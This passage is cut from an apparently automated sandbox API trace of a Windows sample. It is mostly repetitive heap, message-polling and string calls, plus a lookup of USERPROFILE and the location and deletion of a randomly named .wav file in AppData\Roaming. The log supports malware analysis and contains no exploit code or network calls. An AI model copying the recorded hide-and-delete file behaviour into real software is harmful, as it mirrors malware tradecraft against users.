dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0196.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0196.344] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.344] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.344] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0196.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0196.344] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.344] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0196.345] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.345] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0196.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0196.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.346] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.346] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0196.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0196.346] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.346] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0196.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.346] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.346] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.346] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0196.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.347] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0196.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.347] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.347] CryptReleaseContext (hProv=0xad6480, dwFlags=0x0) returned 1 [0196.347] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.347] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.347] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.347] FreeLibrary (hLibModule=0x74d40000) returned 1 [0196.347] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.347] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.348] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.348] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.349] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.349] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.349] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0196.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0196.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0196.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0196.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0196.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.349] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0196.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0196.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0196.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0196.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0196.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0196.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0196.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0196.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0196.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0196.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0196.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0196.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0196.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0196.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0196.351] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/CoTbYkKe.wav", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CoTbYkKe.wav", lpFilePart=0x8bedfc*="CoTbYkKe.wav") returned 0x3a [0196.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0196.351] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CoTbYkKe.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cotbykke.wav")) returned 0x2020 [0196.351] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CoTbYkKe.wav", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cddf390, ftCreationTime.dwHighDateTime=0x1d4d19a, ftLastAccessTime.dwLowDateTime=0x4f0dd5b0, ftLastAccessTime.dwHighDateTime=0x1d4c9b4, ftLastWriteTime.dwLowDateTime=0x4f0dd5b0, ftLastWriteTime.dwHighDateTime=0x1d4c9b4, nFileSizeHigh=0x0, nFileSizeLow=0x1f6a, dwReserved0=0x969, dwReserved1=0x4, cFileName="CoTbYkKe.wav", cAlternateFileName="")) returned 0xaa58e0 [0196.351] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CoTbYkKe.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cotbykke.wav")) returned 1 [0196.352] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cddf390, ftCreationTime.dwHighDateTime=0x1d4d19a, ftLastAccessTime.dwLowDateTime=0x4f0dd5b0, ftLastAccessTime.dwHighDateTime=0x1d4c9b4, ftLastWriteTime.dwLowDateTime=0x4f0dd5b0, ftLastWriteTime.dwHighDateTime=0x1d4c9b4, nFileSizeHigh=0x0, nFileSizeLow=0x1f6a, dwReserved0=0x969, dwReserved1=0x4, cFileName="CoTbYkKe.wav", cAlternateFileName="")) returned 0 [0196.352] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0196.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0196.353] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0196.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0196.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0196.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0196.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0196.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0196.353] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0196.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0196.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0196.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0196.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0196.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0f8 [0196.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0196.354] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0196.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0196.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0196.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0196.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0196.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0196.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0196.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0196.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0196.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0196.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0196.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0196.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0196.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0196.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0196.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0196.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0196.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0196.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0196.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0196.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0196.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/CoTbYkKe.wav", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CoTbYkKe.wav", lpFilePart=0x8bf658*="CoTbYkKe.wav") returned 0x3a [0196.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0196.356] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CoTbYkKe.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cotbykke.wav")) returned 0xffffffff [0196.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0196.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0196.356] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0196.356] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.356] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0196.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0196.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 